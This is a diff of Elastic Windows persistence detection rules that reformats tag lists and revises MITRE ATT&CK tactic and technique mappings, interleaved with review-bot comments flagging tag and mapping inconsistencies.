@@ -68,7 +68,21 @@ references = [ risk_score = 47 rule_id = "ce64d965-6cb0-466d-b74f-8d2c76f47f05" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -80,13 +94,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.002" +name = "Additional Email Delegate Permissions" +reference = "https://attack.mitre.org/techniques/T1098/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 78f2542e3ac..419fec79e13 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -110,7 +110,20 @@ references = [ risk_score = 47 rule_id = "5cf6397e-eb91-4f31-8951-9f0eaa755a31" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -128,18 +141,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.013" +name = "PowerShell Profile" +reference = "https://attack.mitre.org/techniques/T1546/013/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index cc52c54c402..9cb6a3c5279 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [transform] [[transform.osquery]] 
@@ -106,7 +106,17 @@ references = ["https://www.elastic.co/blog/practical-security-engineering-statef risk_score = 73 rule_id = "7405ddf1-6c8e-41ce-818f-48bea6bcaed8" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" @@ -144,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml index eb9b4bf0b71..477f8078256 100644 
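Review bot: The rewritten tag list drops `"Tactic: Privilege Escalation"`, but the threat hunk below keeps the second `[[rule.threat]]` block with tactic TA0004 Privilege Escalation (it only changes blank lines), so the mapping now names a tactic that has no corresponding tag. Either restore `"Tactic: Privilege Escalation",` after `"Tactic: Persistence",` or remove the TA0004 block; as written the two are inconsistent, and the mismatch is the inverse of the one in persistence_msds_alloweddelegateto_krbtgt earlier in the chunk.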
--- a/rules/windows/persistence_registry_uncommon.toml
+++ b/rules/windows/persistence_registry_uncommon.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 
 [rule]
 author = ["Elastic"]
@@ -153,53 +153,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique]] -id = "T1176" -name = "Software Extensions" -reference = "https://attack.mitre.org/techniques/T1176/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.002" name = "Screensaver" reference = "https://attack.mitre.org/techniques/T1546/002/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" -[[rule.threat.technique.subtechnique]] -id = "T1547.004" -name = "Winlogon Helper DLL" -reference = "https://attack.mitre.org/techniques/T1547/004/" -[[rule.threat.technique.subtechnique]] -id = "T1547.014" -name = "Active Setup" -reference = "https://attack.mitre.org/techniques/T1547/014/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
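Review bot: T1037, T1176 and the sub-techniques T1546.012 (Image File Execution Options Injection), T1547.004 (Winlogon Helper DLL) and T1547.014 (Active Setup) are removed from the Persistence block in this hunk, which narrows the rule's documented coverage considerably while the new TA0005 / T1112 block is the only addition. If the query on the preceding lines still watches those registry locations, those technique entries should stay; if the techniques were pruned on purpose, say so in the commit message so the coverage change is traceable.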
diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml index e16151644d7..9bfbeba67ac 100644 --- a/rules/windows/persistence_remote_password_reset.toml +++ b/rules/windows/persistence_remote_password_reset.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -63,7 +63,15 @@ references = [ risk_score = 47 rule_id = "2820c9c2-bcd7-4d6e-9eba-faf3891ba450" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -89,26 +97,26 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + 
diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml index fbae1bd3fd4..5152e42debf 100644 --- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml +++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,13 +89,19 @@ sequence by host.id, user.name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index d236449f23d..d5fd087cd9d 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
@@ -79,7 +79,16 @@ Audit Directory Service Changes (Success) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -93,36 +102,24 @@ any where host.os.type == "windows" and event.code == "5136" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index 10040a4d61f..cbd24408d74 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml +++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -21,7 +21,16 @@ references = [ risk_score = 47 rule_id = "78ef0c95-9dc2-40ac-a8da-5deb6293a14e" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -158,36 +167,53 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" [[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml index 587b3378aff..99867689123 100644 --- a/rules/windows/persistence_service_windows_service_winlog.toml 
+++ b/rules/windows/persistence_service_windows_service_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [transform] [[transform.osquery]] @@ -97,7 +97,15 @@ This rule looks for suspicious services being created with suspicious traits com risk_score = 47 rule_id = "da87eee1-129c-4661-a7aa-57d0b9645fad" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Windows System Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Windows System Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -131,36 +139,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index ef840dc41aa..e142ec77150 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/07" [rule] author = ["Elastic"] @@ -117,31 +117,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml index 3ca6ca332f6..12ea89d5a27 100644 --- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml 
+++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -100,7 +100,15 @@ This rule looks for unsigned processes writing to the Startup folder locations. risk_score = 47 rule_id = "2fba96c0-ade5-4bce-b92f-a5df2509da3f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] type = "eql" query = ''' @@ -123,18 +131,36 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml index 9adfc9ad184..2458d45409b 100644 
--- a/rules/windows/persistence_startup_folder_scripts.toml +++ b/rules/windows/persistence_startup_folder_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -145,18 +145,24 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 361b9902937..7fa5626eea9 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
@@ -62,7 +62,16 @@ references = [ risk_score = 21 rule_id = "16a52c14-7883-47af-8745-9357803f0d4c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -145,36 +154,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index e09bae6d5d5..fcea266ea46 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -123,7 +123,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -137,18 +147,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index fbf4a9d2f66..ed301eb30bb 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] 
@@ -122,36 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index 74baf725777..ec8cdfbd5d8 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = 